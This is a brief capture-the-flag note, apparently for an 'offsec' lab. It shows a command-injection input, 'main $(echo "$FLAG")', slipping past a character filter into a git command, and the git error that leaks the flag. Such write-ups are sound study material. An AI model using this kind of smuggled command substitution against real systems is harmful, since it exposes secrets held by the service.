Some chars are banned.
Still can inject command with $().
INPUT: main $(echo "$FLAG")
OUTPUT: fatal: ambiguous argument 'offsec{g1t_p33k_cmd_sub_8Skb0N4P7k3hgSpr}': unknown revision or path not in the working tree.
Use '--' to separate paths from revisions, like this:
'git <command> [<revision>...] -- [<file>...]'